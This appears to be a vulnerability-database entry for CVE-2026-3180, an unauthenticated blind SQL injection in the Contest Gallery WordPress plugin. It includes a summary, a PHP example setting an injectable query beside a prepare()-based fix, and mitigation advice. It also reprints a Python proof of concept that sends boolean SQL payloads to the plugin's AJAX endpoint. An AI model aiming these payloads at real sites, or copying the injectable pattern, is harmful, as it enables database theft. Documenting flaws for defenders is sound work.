WordPress Contest Gallery 28.1.4 - Unauthenticated Blind SQL Injection
WordPress Contest Gallery plugin versions 28.1.4 and earlier contain an unauthenticated blind SQL injection vulnerability. The issue arises from unsafe handling of the cgl_mail parameter: sanitize_email() does not remove single quote characters from the local part of an email address. The sanitized value therefore reaches the WordPress database query function without parameterization, enabling boolean-based blind SQL injection without authentication. Exploit code is publicly available in Python. No official patch or vendor advisory is currently provided.
AI Analysis
Technical Summary
The WordPress Contest Gallery plugin (<= 28.1.4) is vulnerable to an unauthenticated blind SQL injection via the cgl_mail parameter. The vulnerability occurs because sanitize_email() preserves single quotes in the local part of email addresses, allowing crafted input to be passed directly to wpdb->get_row() without using the prepare() method for safe SQL parameterization. This flaw enables attackers to perform boolean-based blind SQL injection attacks without needing authentication. The vulnerability has been assigned CVE-2026-3180. Exploit code written in Python demonstrates how to send malicious payloads to the plugin's AJAX endpoint to confirm the vulnerability.
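To make the root cause concrete, here is an added illustration that is not code from the Contest Gallery plugin or from the exploit on this page: a minimal WordPress lookup written first the weak way and then with $wpdb->prepare(). The table name (example_entries), the Email column, the AJAX action name and the function names are hypothetical; it assumes it runs inside WordPress so that sanitize_email(), is_email() and $wpdb are available.

```php
<?php
/**
 * Added example, not Contest Gallery code. Runs inside WordPress (a plugin
 * file or after wp-load.php) so that sanitize_email(), is_email() and $wpdb
 * exist. "{$wpdb->prefix}example_entries" and the "Email" column are
 * hypothetical placeholders.
 */

/**
 * Weak pattern. sanitize_email() is an address normaliser, not an SQL
 * escaper: its local-part whitelist includes the single quote, so a value
 * such as o'brien@example.com (a constructed, perfectly legitimate address)
 * passes through unchanged. Interpolated into the string below, the quote
 * terminates the SQL literal and whatever follows it is parsed as SQL.
 */
function example_lookup_weak( $raw_mail ) {
	global $wpdb;
	$mail = sanitize_email( $raw_mail );
	$sql  = "SELECT * FROM {$wpdb->prefix}example_entries WHERE Email = '$mail' LIMIT 1";
	return $wpdb->get_row( $sql );
}

/**
 * Hardened pattern. The value is bound through $wpdb->prepare() as a %s
 * argument, so the database layer escapes it and it can only be compared as
 * data; the apostrophe in o'brien@example.com is matched literally instead
 * of breaking the query. is_email() is kept for clean error handling only:
 * it also accepts a quote in the local part, so prepare() is the control
 * that prevents injection, not the validation.
 */
function example_lookup_safe( $raw_mail ) {
	global $wpdb;
	$mail = sanitize_email( $raw_mail );
	if ( ! is_email( $mail ) ) {
		return null; // not a syntactically valid address; nothing to look up
	}
	$sql = $wpdb->prepare(
		"SELECT * FROM {$wpdb->prefix}example_entries WHERE Email = %s LIMIT 1",
		$mail
	);
	return $wpdb->get_row( $sql );
}

/**
 * Hypothetical AJAX wiring showing where the lookup sits. The nonce check
 * ties the request to a page load and is available to anonymous visitors;
 * it does not make the query safe and is no substitute for prepare().
 */
function example_ajax_handler() {
	check_ajax_referer( 'example_action', 'cg_nonce' );
	$raw = isset( $_POST['cgl_mail'] ) ? wp_unslash( $_POST['cgl_mail'] ) : '';
	$row = example_lookup_safe( $raw );
	wp_send_json( array( 'found' => null !== $row ) );
}
add_action( 'wp_ajax_nopriv_example_action', 'example_ajax_handler' );
add_action( 'wp_ajax_example_action', 'example_ajax_handler' );
```

The point of the two functions side by side is that stripping quotes would be the wrong fix: apostrophes are valid in real addresses, so rejecting or removing them breaks legitimate users while still leaving every other interpolation site exposed. Binding the value with prepare() fixes the class of bug rather than one character.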
Potential Impact
An unauthenticated attacker can exploit this vulnerability to perform boolean-based blind SQL injection attacks against the WordPress database used by the Contest Gallery plugin. This could allow the attacker to infer sensitive information from the database, potentially leading to data disclosure or further compromise depending on the database contents and privileges. There is no evidence of known exploits in the wild at this time.
Mitigation Recommendations
No official patch or vendor advisory is currently available for this vulnerability. Patch status is not yet confirmed — check the vendor's website and official plugin repository for updates. Until a fix is released, consider disabling or removing the affected plugin version to prevent exploitation. Monitor official sources for remediation guidance.
Indicators of Compromise
- exploit-code:

# Exploit Title: WordPress Contest Gallery 28.1.4 - Unauthenticated Blind SQL Injection
# Google Dork: N/A
# Date: 2026-06-02
# Exploit Author: cardosource
# Vendor Homepage: https://contest-gallery.com/
# Software Link: https://wordpress.org/plugins/contest-gallery/
# Version: <= 28.1.4
# Tested on: Docker - PHP 8.2/Apache + MariaDB (WordPress Environment)
# CVE: 2026-3180
"""
Description
A Blind SQL Injection vulnerability exists in Contest Gallery versions 28.1.4 and earlier.
The issue is caused by the unsafe use of the cgl_mail parameter, where sanitize_email()
preserves the single quote (') character in the local part of an email address.
As a result, user-controlled input reaches wpdb->get_row() without proper
parameterization via prepare(), allowing unauthenticated attackers to perform
boolean-based blind SQL injection.
Authentication Required: No
"""
import requests
import json

NONCE = " "
URL = "http://localhost:8080/wp-admin/admin-ajax.php"
endpoint = "/wp-admin/admin-ajax.php"
url = "http://localhost:8080/"
payload = "'OR/**/1=1#@teste.com' and 'OR/**/1=2#@teste.com"


def send_payload(mail):
    # Submit the candidate e-mail value to the plugin's AJAX action.
    data = {
        "action": "post_cg1l_resend_unconfirmed_mail_frontend",
        "cgl_mail": mail,
        "cgl_page_id": "1",
        "cgl_activation_key": "",
        "cg_nonce": NONCE,
    }
    return requests.post(URL, data=data)


r_true = send_payload("qualquer'OR/**/1=1#@teste.com")
if r_true.status_code == 200:
    status_code = r_true.status_code
    banner = f"""
    CVE : 2026-3180 | Contest Gallery 28.1.4 : Boolean SQLi
    payload :........................{payload}
    end point :........................{endpoint}
    url :..............................{url}
    status :...........................{status_code}
    nonce :............................{NONCE}
    """
    print(banner)
    print(f"Body length: {len(r_true.text)} chars")
    poc = f'''\nmariadb wordpress_db -e "SELECT * FROM wp_contest_gal1ery_create_user_entries ORDER BY Tstamp DESC LIMIT 1115;"'''
    print(poc)
Technical Details
- Version: <= 28.1.4
- Vendor: https://contest-gallery.com
- Application: https://wordpress.org/plugins/contest-gallery
- Author: cardosource
- Platform: Docker - PHP 8.2/Apache + MariaDB
- EDB ID: 52609
- Has exploit code: true
- Code language: Python
Threat ID: 6a234b62e29bf47b50cd7c41
Added to database: 6/5/2026, 10:19:14 PM
Last enriched: 6/5/2026, 10:19:18 PM
Last updated: 6/6/2026, 1:41:30 AM